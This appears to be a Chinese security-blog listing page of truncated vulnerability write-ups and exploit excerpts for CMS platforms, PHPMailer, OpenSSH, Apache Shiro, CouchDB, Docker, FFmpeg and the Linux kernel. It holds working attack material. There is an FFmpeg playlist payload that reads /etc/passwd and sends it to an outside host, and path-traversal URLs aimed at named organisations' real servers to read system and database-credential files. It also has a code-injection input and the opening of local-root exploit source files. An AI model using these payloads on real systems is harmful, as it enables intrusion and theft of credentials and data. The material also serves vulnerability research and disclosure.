漏洞出现在:class ：  mem_issueprotected void Page_Load(object sender, EventArgs e) //页面加载事件 { //method_15 这里判断变量 A-Z 0-9 method_16转换为int 成功返回TRUE 前面没什么好看的 看下面 this.method_4(); if ((!this.method_15(this.Request.QueryString["table"]) || !this.method_16(this.Request.QueryString["detailid"]) ? 0 : (this.method_16(this.Request.QueryString["workid"]) ? 1 : 0)) == 0) { this.Response.Write("<script type='text/javascript'>alert('参数错误!');parent.CloseDialog()</script>"); this.Response.End(); } if (this.Request.QueryString["from"] == "master") ...继续阅读 (9)

在tpl.php中/*--------------------------- function savetagfile() { } 保存标签碎片修改 --------------------------*/ else if($action=='savetagfile') { if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename)) { ShowMsg('文件名不合法，不允许进行操作！', '-1'); exit(); } require_once(DEDEINC.'/oxwindow.class.php'); $tagname = preg_replace("#\.lib\.php$#i", "", $filename); $content = stripslashes($content); $truefile = DEDEINC.'/taglib/'.$filename; $fp = fopen($truefile, 'w'); fwrite($fp, $content); fclose($fp); $msg = "测试标签：(需要使用环境变量的不能在此测试){dede:{$tagname} }{/d ...继续阅读 (17)

注入分析\inc\common.inc.phpphp function SecureRequest(&$var) { if (is_array($var)) { foreach ($var as $_k =$_v ) { $var[$_k] = securerequest($_v); } } else { if ((0 < strlen($var)) && preg_match("#^(MYOA_|GLOBALS|_GET|_POST|_COOKIE|_ENV|_SERVER|_FILES|_SESSION)#", $var)) { exit("Invalid Parameters!"); } if (!get_magic_quotes_gpc()) { $var = addslashes($var); } } return $var; } function CheckRequest(&$val) { if (is_array($val)) { foreach ($val as $_k => $_v ) { checkre ...继续阅读 (23)

坦白的说，看到限制条件就觉得不爱了，搞得上班还迟到.就是没有注意看条件.要是直接docker运行多好。Before thiscommitinclass.phpmailer.phpin a certain scenarion there is no filter in the sender's email address special chars. This flaw can lead to a remote code execution, viamailfunctionhere.To trigger this code, you need:* PHPMailer < 5.2.18 * Compile PHP without PCRE. * PHP version must be inferior to 5.2.0.So you can bypass the sender's email validation onvalidateAddressfunction, settingpatternselecttonoregex. To make easier to archieve such environment without having to setup PHP like this I just hardcoded itthis code.作者是本地进行调试的python -m ...继续阅读 (12)

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009 The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and pas ...继续阅读 (18)

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009 The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it a ...继续阅读 (9)

Author:Sinner漏洞文件：\controllers\ApiController.php Line 54public function downAction() {         $data = fn_authcode(base64_decode($this->get('file')), 'DECODE');         $file = isset($data['finecms']) && $data['finecms'] ? $data['finecms'] : '';         if (empty($file)) {             $this->msg(lang('a-mod-213'));         }         if (strpos($file, ':/')) {             //远程             header("Location: $file");         } else {             //本地             $file = str_replace('..', '', $file);             $file = strpos($file, '/') === 0 ? APP_ROOT.$file : $file;             if (!is_file($f ...继续阅读 (14)

最新版尝试通过，具体的版本为5.3.12.这是一个比较老的漏洞了，不知道为什么，metinfo 还是没有修复，网上的介绍都比较简单，我这里就详细的解释一下\app\system\include\compatible\metv5_top.php//获取当前应用栏目信息 $PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $PHP_SELFs = explode('/', $PHP_SELF); print_r($PHP_SELFs); $query = "SELECT * FROM {$_M['table'][column]} where module!=0 and foldername = '{$PHP_SELFs[count($PHP_SELFs)-2]}' and lang='{$_M['lang']}'"; $column = DB::get_one($query);这里调用了 $_SERVER[‘SCRIPT_NAME’] 去获取网站路径，但是这里有一个问题就是，路径中并没有waf 处理，可以导致一些安全问题，代码里面就直接 explode 函数对路径进行了切割，这里取出了倒数第二个参数，并且未经过处理就带入了 sql 语句里面，我们看看 这个文件的剩下的一些代 ...继续阅读 (12)

最新版尝试通过，具体的版本为5.3.12.这是一个比较老的漏洞了，不知道为什么，metinfo 还是没有修复，网上的介绍都比较简单，我这里就详细的解释一下\app\system\include\compatible\metv5_top.php//获取当前应用栏目信息 $PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $PHP_SELFs = explode('/', $PHP_SELF); print_r($PHP_SELFs); $query = "SELECT * FROM {$_M['table'][column]} where module!=0 and foldername = '{$PHP_SELFs[count($PHP_SELFs)-2]}' and lang='{$_M['lang']}'"; $column = DB::get_one($query);这里调用了 $_SERVER[‘SCRIPT_NAME’] 去获取网站路径，但是这里有一个问题就是，路径中并没有waf 处理，可以导致一些安全问题，代码里面就直接 explode 函数对路径进行了切割，这里取出了倒数第二个参数，并且未经过处理就带入了 sql 语句里面，我们看看 这个文件的剩下的一些代 ...继续阅读 (11)

简单看了下该程序的mvc，锁定了一个可疑处，config/site.ini.php与后台此处对应点击添加网站网站名称随便写绑定的域名写为’,phpinfo()【注：此处为了省事仅用phpinfo作为例子，实际此处可做任何操作，只需要在’,后面添加php语句即可，可通过file_put_contents进行写入文件操作】然后直接点击提交即可然后访问/index.php?s=admin&c=site即可看到phpinfo输出的信息 ...继续阅读 (6)

分析所用版本4.2.1漏洞的本质是forumrunner/includes/moderation.php文件中， do_get_spam_data()函数()对参数postids和threadid过滤不严导致SQL注入漏洞， 核心代码如下：function do_get_spam_data (){       global $vbulletin, $db, $vbphrase;     $vbulletin->input->clean_array_gpc('r', array(     'threadid' => TYPE_STRING,     'postids' => TYPE_STRING,     ));     ...     }else if ($vbulletin->GPC['postids'] != '') {         $postids = $vbulletin->GPC['postids'];         $posts = $db->query_read_slave("             SELECT post.postid, post.threadid, post.visible, post.title, post.userid,                 thread.forum ...继续阅读 (4)

from:http://www.cnbraid.com/2016/09/14/phpcms/0x01 背景周末审计了下phpcms的最新版本，前台已经很难找到漏洞了，故看了看后台相关的代码，发现还是有一处可以拿shell的漏洞。由于默认安装后需要超级管理员权限，故该漏洞很鸡肋，但感觉应该会在其它cms中也存在，所以主要分享下挖掘思路~PS：使用的测试环境是php5.6(已经移除gpc选项)0x02 漏洞分析漏洞起源：yoursite\phpsso_server\phpcms\modules\admin\system.php下的uc函数：<?php public function uc() { if (isset($_POST['dosubmit'])) { $data = isset($_POST['data']) ? $_POST['data'] : ''; $data['ucuse'] = isset($_POST['ucuse']) && intval($_POST['ucuse']) ? intval($_POST['ucuse']) : 0; $filepath = CACHE_PATH.'configs'.DIRECTORY_SEPARATOR.'system.php'; $config = include $filepath; ...继续阅读 (25)

漏洞版本20160723，官方于今天修复了该漏洞。0x01:漏洞分析在文件 admin.php 第四行：$frames = array('login', 'index', 'body', 'config'....); $iframe = !empty($_GET['iframe']) && in_array($_GET['iframe'], $frames) ? $_GET['iframe'] : 'login'; include_once 'source/admincp/module/'.$iframe.'.php';变量 $iframe 通过 GET 方式获取值，如果 iframe 的值不在数组 frames 里就定向到 “login.php”。我们以 “config.php” 为例，当传入参数 “?iframe=config” 时将包含文件 “source/admincp/module/config.php”,跟进该文件从第二行可以看到如下代码：if(!defined('IN_ROOT')){exit('Access denied');} Administrator(2); $action=SafeRequest("action","get" ...继续阅读 (20)

Author: rungobier (知道创宇404安全实验室)0x00 概述Apache Shiro 在 Java 的权限及安全验证框架中占用重要的一席之地，在它编号为550的 issue 中爆出严重的 Java 反序列化漏洞。下面，我们将模拟还原此漏洞的场景以及分析过程。0x01 漏洞场景还原首先，需要获取 Apache Shiro 存在漏洞的源代码，具体操作如下:git clone https://github.com/apache/shiro.git git checkout shiro-root-1.2.4 cd ./shiro/samples/web为了配合生成反序列化的漏洞环境，需要添加存在漏洞的 jar 包，编辑 pom.xml 文件，添加如下行：<!-- 需要设置编译的版本 --> <properties> <maven.compiler.source>1.6</maven.compiler.source> <maven.compiler.target>1.6</maven.compiler.target> </properties> ... <dependencies> <depende ...继续阅读 (10)

--------------------------------------------------- decr.c --------------------------------------------------- /** * Ubuntu 16.04 local root exploit - netfilter target_offset OOB * check_compat_entry_size_and_hooks/check_entry * * Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c * * Vitaly Nikolenko * vnik@cyseclabs.com * 23/04/2016 * * * ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers * automatic loading). * * vnik@ubuntu:~$ uname -a * Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux ...继续阅读 (55)

ModNar@0keeTeam起因&漏洞点在看ImageMagick影响DZ这条线,排查上传点时发现的有问题逻辑简单说就是:1.正则并没对content参数包含的url部分内容做限制,2.DZ图片后缀检查函数可用aaa.php#b.jpg绕过3.DZ图片内容检查函数限制了非图片文件请求的SSRF利用后的回显前提分析source\include\portalcp\portalcp_upload.phpLine 19:if($aid) { //目前只能走aid存在的逻辑,原因上面已解释 $article = C::t('portal_article_title')->fetch($aid); if(!$article) { portal_upload_error(lang('portalcp', 'article_noexist')); } if(check_articleperm($catid, $aid, $article, false, true) !== true) { portal_upload_error(lang('portalcp', 'article_noallowed')); ...继续阅读 (139)

from:lonelyrain.me哎哎哎,老司机一言不合就爆洞啊,这个洞在之前分析CVE-2016-3714的时候也发现了,结果被捂烂了…心塞塞~那我就写一下当时是怎么发现怎么这个洞…##漏洞分析正文之前在分析CVE-2016-3714的时候想,system()函数处理有问题,那么其他类似的有哪些函数呢?下面是一个可以执行命令的函数列表:<span class="line">system() popen() fork()+exec() execl()</span>那么搜索一下调用system()函数有哪些地方?经过搜索的话,最终只有CVE-2016-3714这个漏洞点调用到了一个system(). 那这么接下来搜索一下popen()函数调用点文件:magick/blob.c:2503行<span class="line">#if defined(SIGPIPE) if (*type == 'w') (void) signal(SIGPIPE,SIG_IGN); #endif *mode=(*type); mode[1]='\0'; image-&gt;blob-&gt;file_info.file=(FILE *) po ...继续阅读 (35)

from:安全脉搏详情CouchDB 是一个开源的面向文档的数据库管理系统，可以通过RESTful JavaScript Object Notation (JSON) API访问。CouchDB会默认会在5984端口开放Restful的API接口，用于数据库的管理功能。那么，问题出在哪呢？翻阅官方描述会发现，CouchDB中有一个Query_Server的配置项，在官方文档中是这么描述的：CouchDB delegates computation of design documents functions to external query servers. The external query server is a special OS process which communicates with CouchDB over standard input/output using a very simple line-based protocol with JSON messages.直白点说，就是CouchDB允许用户指定一个二进制程序或者脚本，与CouchDB进行数据交互和处理，query_server在配置文件local.ini中的格式：[query_servers] LANGUAGE = PATH ARGS默认情况下，配置文件中已经设置了两个query_servers: ...继续阅读 (41)

from:安全脉搏0x00 概述最近提交了一些关于 docker remote api 未授权访问导致代码泄露、获取服务器root权限的漏洞，造成的影响都比较严重，比如新姿势之获取果壳全站代码和多台机器root权限新姿势之控制蜻蜓fm所有服务器新姿势之获取百度机器root权限因为之前关注这一块的人并不多，这个方法可以算是一个“新的姿势”，本文对漏洞产生的原因和利用过程进行简单的分析和说明，但因为时间和精力有限，可能会有错误，欢迎大家指出～0x01 起因先介绍一些东西～docker swarmdocker swarm是一个将docker集群变成单一虚拟的docker host工具，使用标准的Docker API，能够方便docker集群的管理和扩展，由docker官方提供，具体的大家可以看官网介绍。漏洞发现的起因是，有一位同学在使用docker swarm的时候，发现了管理的docker 节点上会开放一个TCP端口2375，绑定在0.0.0.0上，http访问会返回404 page not found，然后他研究了下，发现这是Docker Remote API，可以执行docker命令，比如访问http://host:2375/containers/json会返回服务器当前运行的 container列表，和在docker CLI上执行docker ps的效果一样，其他操作比如创建/删 ...继续阅读 (24)

from:安全脉搏经历过ImageMagick命令执行漏洞的洗礼之后，又有FFmpeg文件读取漏洞，真是很激情。看了老外写的文章，大概理解的利用方式如下：#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://www.secpulse.com/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST以上内容保存成test.avi，是用来上传到被攻击服务器的。#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://www.secpulse.com?以上内容保存成header.m3u8，将header.m3u8上传到你的服务器，然后把test.avi上传到攻击服务器，如果有漏洞，会收到如下的日志： 会收到三条日志记录，第一条是请求header.m3u8文件的，第三条中就包含了读取的部分文件内容，说明是存在此漏洞的。header.m3u8文件的内容大概是将让你的web产生日志并且传回读取的文件内容。这个漏洞可以用来本地文件读取（返回部分内容）和SSRF。 具体的参考老外写的分析文章：https://habrahabr.ru/company/mailru/blog/274855/还有ffmpeg的说明文档：https://www.f ...继续阅读 (69)

漏洞作者：不能忍详细说明：漏洞位置xpshop.webui.Show:private void GetImg(string pids) { ProductDB productDB = new ProductDB(); DataTable thumbnailImg = productDB.GetThumbnailImg(pids); thumbnailImg.TableName = "Products"; base.Response.Write(XpShopJson.DtToJSON(thumbnailImg)); }这里是问题函数，我就不写怎么跟进来的，就是page_load,等下直接用payload测试就好了，官网demo的。跟进去GetThumbnailImg函数：public DataTable GetThumbnailImg(string pid) { string commandText = "SELECT ProductID,ProductName,ThumbnailImg,CategoryID,CategoryNo FROM Product WHERE ProductID = " + pid; return XpShopDB.ExecuteDataTable(XpShopDB.ConnectionString, CommandType.Text, commandTex ...继续阅读 (27)

漏洞作者：不能忍详细说明：漏洞位置:xpshop.webui.MyRefundprotected void Page_Load(object sender, EventArgs e) { if (Utils.request(base.Request.QueryString["type"]) &amp;&amp; Utils.request(base.Request.QueryString["Action"])) { string text = base.Request.QueryString["Action"]; if (text != null) { if (!(text == "GetImg")) { if (text == "GetPackageGID") { base.Response.Write(new ProductDB().GetPackagePdtGID(int.Parse(base.Request.QueryString["PackagePID"]))); } } else { t ...继续阅读 (20)

/* https://gist.github.com/PerceptionPointTeam/18b1e86d1c0f8531ff8f */ /* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */ /* $ ./cve_2016_072 PP_KEY */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <keyutils.h> #include <unistd.h> #include <time.h> #include <unistd.h> #include <sys/ipc.h> #include <sys/msg.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cr ...继续阅读 (262)

graphs_new.phpfunction form_save() { if (isset($_POST["save_component_graph"])) { /* summarize the 'create graph from host template/snmp index' stuff into an array */ while (list($var, $val) = each($_POST)) { if (preg_match('/^cg_(\d+)$/', $var, $matches)) { $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true; //cg_g is not filtered }elseif (preg_match('/^cg_g$/', $var)) { if ($_POST["cg_g"] > 0) { $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true; //给数组赋值 ...继续阅读 (164)

一段很弱的xss过滤函数/** * xss过滤函数 * * @param $string * @return string */ function remove_xss($string) { $string = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $string); $parm1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base'); $parm2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onb ...继续阅读 (19)

在会员头像上传处public function avatar() { if(checksubmit('dosubmit')) { if(empty($_GET['avatar'])) { showmessage('请上传头像','',0); } $avatar = $_GET['avatar']; $x = (int) $_GET['x']; $y = (int) $_GET['y']; $w = (int) $_GET['w']; $h = (int) $_GET['h']; if(is_file($avatar) && file_exists($avatar)) { $ext = strtolower(pathinfo($avatar, PATHINFO_EXTENSION)); $name = basename($avatar, '.'.$ext); $dir = dirname($avatar); if(in_array($ext, array('gif','jpg','jpeg','bmp','png'))) { $name = $name.'_crop_200_200.'.$ext; $file = $dir.'/'.$name; $image = new image($avatar); $image->crop($w, $h, $x, $y, 2 ...继续阅读 (21)

/* just another overlayfs exploit, works on kernels before 2015-12-26 # Exploit Title: overlayfs local root # Date: 2016-01-05 # Exploit Author: rebel # Version: Ubuntu 14.04 LTS, 15.10 and more # Tested on: Ubuntu 14.04 LTS, 15.10 # CVE : CVE-2015-8660 blah@ubuntu:~$ id uid=1001(blah) gid=1001(blah) groups=1001(blah) blah@ubuntu:~$ uname -a && cat /etc/issue Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux Ubuntu 14.04.3 LTS \n \l blah@ubuntu:~$ ./overlayfail root@ubuntu:~# id uid=0(root) gid=1001(blah) groups=0(root ...继续阅读 (218)

漏洞作者：管管侠详细说明：可以遍历各种系统文件，影响大量知名政校企漏洞证明：中粮集团http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd还可以读取默认配置文件http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml下面有中粮几十组数据库配置，数据库群民生电商http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd数据库配置http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml清华大学http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passw ...继续阅读 (63)

漏洞作者：路人甲简要描述：1.网络磁盘 越权访问上层目录泄露文件名2.通过添加附件将敏感文件发送到指定邮箱3.获取邮件ID后读取任意邮件内容详细说明：漏洞1.code 区域GET http://**.**.**.**/extmail/cgi/netdisk.cgi?__mode=list_dir&amp;sid=xxxxf&amp;base=../.. HTTP/1.1漏洞2.漏洞3.code 区域GET http://**.**.**.**/extmail/cgi/readmsg.cgi?__mode=readmsg_sum&amp;sid=xxxxxxxxxxxx&amp;folder=Inbox&amp;msgid=1425325541.M840749P12107V0000000000000802I00000000057872F9_0.mail2014,S=25968:2,S&amp;pos=0 HTTP/1.1 sgid=1425325541.M840749P12107V0000000000000802I00000000057872F9_0.mail2014,S=25968:2,SGET之后获取邮件内容。sid=为登录后的标示sgid 从获取的文件中读取以上操作普通账号登录后即可伪造漏洞证明：图1.图2.图3. ...继续阅读 (205)

#!/usr/bin/python # CVE-2015-5287 (?) # abrt/sosreport RHEL 7.0/7.1 local root # rebel 09/2015 # [user@localhost ~]$ python sosreport-rhel7.py # crashing pid 19143 # waiting for dump directory # dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143 # waiting for sosreport directory # sosreport: sosreport-localhost.localdomain-20151130194114 # waiting for tmpfiles # tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ'] # moving directory # moving tmpfiles # tmpurfpyY -> tmpurfpyY.old # tmpYnCfnQ -> tmpYnCfnQ.old # waiting for sosreport to finish (can take several minutes)....................... ...继续阅读 (52)